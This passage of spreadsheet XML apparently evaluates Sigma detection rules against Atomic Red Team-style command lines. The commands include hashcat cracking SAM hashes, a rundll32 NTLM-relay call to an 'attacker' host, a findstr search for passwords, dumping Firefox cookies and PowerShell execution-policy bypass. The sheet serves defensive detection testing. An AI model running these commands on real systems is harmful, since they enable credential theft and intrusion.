          <t>HackTool - Hashcat Password Cracker Execution</t>
        </is>
      </c>
      <c r="D436" s="44" t="inlineStr">
        <is>
          <t>39b31e81-5f5f-4898-9c0e-2160cfc0f9bf</t>
        </is>
      </c>
      <c r="E436" s="44" t="inlineStr">
        <is>
          <t>C:\AtomicRedTeam\atomics\..\ExternalPayloads\hashcat6\hashcat-6.1.1\hashcat.exe -a 0 --hash-type 1000 -r .
ules\Incisive-leetspeak.rule C:\AtomicRedTeam\atomics\T1110.002\src\sam.txt C:\AtomicRedTeam\atomics\T1110.002\src\password.lst</t>
        </is>
      </c>
      <c r="F436" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G436" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H436" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I436" s="43" t="n"/>
      <c r="J436" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K436" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="437" ht="15.75" customHeight="1" s="42">
      <c r="A437" s="44" t="inlineStr">
        <is>
          <t>t1110.002</t>
        </is>
      </c>
      <c r="B437" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_hashcat</t>
        </is>
      </c>
      <c r="C437" s="44" t="inlineStr">
        <is>
          <t>HackTool - Hashcat Password Cracker Execution</t>
        </is>
      </c>
      <c r="D437" s="44" t="inlineStr">
        <is>
          <t>39b31e81-5f5f-4898-9c0e-2160cfc0f9bf</t>
        </is>
      </c>
      <c r="E437" s="44" t="inlineStr">
        <is>
          <t>C:\AtomicRedTeam\atomics\..\ExternalPayloads\hashcat6\hashcat-6.1.1\hashcat.exe -a  0 -m 1000  -r  .
ules\Incisive-leetspeak.rule C:\AtomicRedTeam\atomics\T1110.002\src\sam.txt C:\AtomicRedTeam\atomics\T1110.002\src\password.lst</t>
        </is>
      </c>
      <c r="F437" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G437" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H437" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I437" s="44" t="n"/>
      <c r="J437" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K437" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="438" ht="15.75" customHeight="1" s="42">
      <c r="A438" s="43" t="inlineStr">
        <is>
          <t>t1119</t>
        </is>
      </c>
      <c r="B438" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_automated_collection</t>
        </is>
      </c>
      <c r="C438" s="43" t="inlineStr">
        <is>
          <t>Automated Collection Command Prompt</t>
        </is>
      </c>
      <c r="D438" s="43" t="inlineStr">
        <is>
          <t>f576a613-2392-4067-9d1a-9345fb58d8d1</t>
        </is>
      </c>
      <c r="E438" s="43" t="inlineStr">
        <is>
          <t>findstr.exe /S ".docx" C:\Users\*.*</t>
        </is>
      </c>
      <c r="F438" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G438" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H438" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I438" s="43" t="n"/>
      <c r="J438" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K438" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="439" ht="15.75" customHeight="1" s="42">
      <c r="A439" s="44" t="inlineStr">
        <is>
          <t>t1119</t>
        </is>
      </c>
      <c r="B439" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_automated_collection</t>
        </is>
      </c>
      <c r="C439" s="44" t="inlineStr">
        <is>
          <t>Automated Collection Command Prompt</t>
        </is>
      </c>
      <c r="D439" s="44" t="inlineStr">
        <is>
          <t>f576a613-2392-4067-9d1a-9345fb58d8d1</t>
        </is>
      </c>
      <c r="E439" s="43" t="inlineStr">
        <is>
          <t>for /r C:\Users\ %i in (*.doc*) do @echo %i</t>
        </is>
      </c>
      <c r="F439" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G439" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H439" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I439" s="43" t="n"/>
      <c r="J439" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K439" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="440" ht="15.75" customHeight="1" s="42">
      <c r="A440" s="43" t="inlineStr">
        <is>
          <t>t1212</t>
        </is>
      </c>
      <c r="B440" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_ntlmrelay</t>
        </is>
      </c>
      <c r="C440" s="43" t="inlineStr">
        <is>
          <t>Suspicious NTLM Authentication on the Printer Spooler Service</t>
        </is>
      </c>
      <c r="D440" s="43" t="inlineStr">
        <is>
          <t>bb76d96b-821c-47cf-944b-7ce377864492</t>
        </is>
      </c>
      <c r="E440" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\.\System32\davclnt.dll,DavSetCookie http://attacker/spoolss</t>
        </is>
      </c>
      <c r="F440" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G440" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H440" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I440" s="43" t="n"/>
      <c r="J440" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K440" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="441" ht="15.75" customHeight="1" s="42">
      <c r="A441" s="44" t="inlineStr">
        <is>
          <t>t1212</t>
        </is>
      </c>
      <c r="B441" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_ntlmrelay</t>
        </is>
      </c>
      <c r="C441" s="44" t="inlineStr">
        <is>
          <t>Suspicious NTLM Authentication on the Printer Spooler Service</t>
        </is>
      </c>
      <c r="D441" s="44" t="inlineStr">
        <is>
          <t>bb76d96b-821c-47cf-944b-7ce377864492</t>
        </is>
      </c>
      <c r="E441" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe davclnt.dll,DavSetCookie http://attacker/spoolss</t>
        </is>
      </c>
      <c r="F441" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G441" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H441" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I441" s="43" t="n"/>
      <c r="J441" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K441" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="442" ht="15.75" customHeight="1" s="42">
      <c r="A442" s="43" t="n"/>
      <c r="B442" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C442" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D442" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E442" s="43" t="inlineStr">
        <is>
          <t>findstr.exe -si "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F442" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G442" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H442" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I442" s="43" t="n"/>
      <c r="J442" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K442" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="443" ht="15.75" customHeight="1" s="42">
      <c r="A443" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B443" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C443" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D443" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E443" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F443" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G443" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H443" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I443" s="43" t="n"/>
      <c r="J443" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K443" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="444" ht="15.75" customHeight="1" s="42">
      <c r="A444" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B444" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C444" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D444" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E444" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F444" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G444" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H444" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I444" s="43" t="n"/>
      <c r="J444" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K444" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="445" ht="15.75" customHeight="1" s="42">
      <c r="A445" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B445" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C445" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D445" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E445" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F445" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G445" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H445" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I445" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J445" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K445" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="446" ht="15.75" customHeight="1" s="42">
      <c r="A446" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B446" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C446" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D446" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E446" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F446" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G446" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H446" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I446" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J446" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K446" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="447" ht="15.75" customHeight="1" s="42">
      <c r="A447" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B447" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C447" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D447" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E447" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F447" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G447" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H447" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I447" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J447" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K447" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="448" ht="15.75" customHeight="1" s="42">
      <c r="A448" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B448" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C448" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D448" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E448" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F448" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G448" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H448" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I448" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J448" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K448" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="449" ht="15.75" customHeight="1" s="42">
      <c r="A449" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B449" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C449" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D449" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E449" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F449" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G449" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H449" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I449" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J449" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K449" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="450" ht="15.75" customHeight="1" s="42">
      <c r="A450" s="44" t="n"/>
      <c r="B450" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_firefox_gecko_profile_data</t>
        </is>
      </c>
      <c r="C450" s="44" t="inlineStr">
        <is>
          <t>SQLite Firefox Profile Data DB Access</t>
        </is>
      </c>
      <c r="D450" s="44" t="inlineStr">
        <is>
          <t>4833155a-4053-4c9c-a997-777fcea0baa7</t>
        </is>
      </c>
      <c r="E450" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c copy "%APPDATA%\Mozilla\Firefox\Profiles\.default-release\cookies.sqlite" %TEMP%\temp_data.db &amp;&amp; sqlite3.exe %TEMP%\temp_data.db "SELECT * FROM moz_cookies;"</t>
        </is>
      </c>
      <c r="F450" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G450" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H450" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I450" s="44" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b); Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b)</t>
        </is>
      </c>
      <c r="J450" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K450" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="451" ht="15.75" customHeight="1" s="42">
      <c r="A451" s="44" t="n"/>
      <c r="B451" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_firefox_gecko_profile_data</t>
        </is>
      </c>
      <c r="C451" s="44" t="inlineStr">
        <is>
          <t>SQLite Firefox Profile Data DB Access</t>
        </is>
      </c>
      <c r="D451" s="44" t="inlineStr">
        <is>
          <t>4833155a-4053-4c9c-a997-777fcea0baa7</t>
        </is>
      </c>
      <c r="E451" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" copy "%APPDATA%\Mozilla\Firefox\Profiles\.default-release\cookies.sqlite" %TEMP%\temp_data.db &amp;&amp; sqlite3.exe %TEMP%\temp_data.db "SELECT * FROM moz_cookies;"</t>
        </is>
      </c>
      <c r="F451" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G451" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H451" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I451" s="43" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b); Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b)</t>
        </is>
      </c>
      <c r="J451" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K451" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="452" ht="15.75" customHeight="1" s="42">
      <c r="A452" s="44" t="n"/>
      <c r="B452" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_firefox_gecko_profile_data</t>
        </is>
      </c>
      <c r="C452" s="44" t="inlineStr">
        <is>
          <t>SQLite Firefox Profile Data DB Access</t>
        </is>
      </c>
      <c r="D452" s="44" t="inlineStr">
        <is>
          <t>4833155a-4053-4c9c-a997-777fcea0baa7</t>
        </is>
      </c>
      <c r="E452" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C copy "%APPDATA%\Mozilla\Firefox\Profiles\.default-release\cookies.sqlite" %TEMP%\temp_data.db &amp;&amp; sqlite3.exe %TEMP%\temp_data.db "SELECT * FROM moz_cookies;"</t>
        </is>
      </c>
      <c r="F452" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G452" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H452" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I452" s="44" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b); Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b)</t>
        </is>
      </c>
      <c r="J452" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K452" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="453" ht="15.75" customHeight="1" s="42">
      <c r="A453" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B453" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C453" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D453" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E453" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F453" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G453" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H453" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I453" s="43" t="n"/>
      <c r="J453" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K453" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="454" ht="15.75" customHeight="1" s="42">
      <c r="A454" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B454" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C454" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D454" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E454" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F454" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G454" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H454" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I454" s="43" t="n"/>
      <c r="J454" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K454" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="455" ht="15.75" customHeight="1" s="42">
      <c r="A455" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B455" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C455" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D455" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E455" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F455" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G455" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H455" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I455" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J455" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K455" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="456" ht="15.75" customHeight="1" s="42">
      <c r="A456" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B456" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C456" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D456" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E456" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F456" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G456" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H456" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I456" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J456" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K456" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="457" ht="15.75" customHeight="1" s="42">
      <c r="A457" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B457" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C457" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D457" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E457" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F457" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G457" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H457" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I457" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J457" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K457" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="458" ht="15.75" customHeight="1" s="42">
      <c r="A458" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B458" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C458" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D458" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E458" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F458" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G458" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H458" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I458" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J458" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K458" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="459" ht="15.75" customHeight="1" s="42">
      <c r="A459" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B459" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C459" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D459" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E459" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F459" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G459" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H459" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I459" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J459" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K459" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="460" ht="15.75" customHeight="1" s="42">
      <c r="A460" s="43" t="n"/>
      <c r="B460" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C460" s="44" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D460" s="44" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E460" s="44" t="inlineStr">
        <is>
          <t>copy C:\Tools\Rubeus.exe C:\Windows\Temp\not_malware.exe</t>
        </is>
      </c>
      <c r="F460" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G460" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H460" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I460" s="44" t="n"/>
      <c r="J460" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K460" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="461" ht="15.75" customHeight="1" s="42">
      <c r="A461" s="43" t="inlineStr">
        <is>
          <t>t1552</t>
        </is>
      </c>
      <c r="B461" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_eventlog_content_recon</t>
        </is>
      </c>
      <c r="C461" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious EventLog Recon Activity Using Log Query Utilities</t>
        </is>
      </c>
      <c r="D461" s="43" t="inlineStr">
        <is>
          <t>beaa66d6-aa1b-4e3c-80f5-e0145369bfaf</t>
        </is>
      </c>
      <c r="E461" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-TerminalServices-LocalSessionManager/Operational'; Id=21}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F461" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G461" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H461" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I461" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious EventLog Recon Activity Using Log Query Utilities (beaa66d6-aa1b-4e3c-80f5-e0145369bfaf); Potentially Suspicious EventLog Recon Activity Using Log Query Utilities (beaa66d6-aa1b-4e3c-80f5-e0145369bfaf)</t>
        </is>
      </c>
